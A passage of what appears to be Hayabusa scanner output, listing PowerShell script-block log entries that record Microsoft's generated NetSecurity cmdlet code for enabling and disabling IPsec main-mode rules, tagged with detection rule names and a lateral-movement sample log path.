$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"NotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject'))",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"NotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 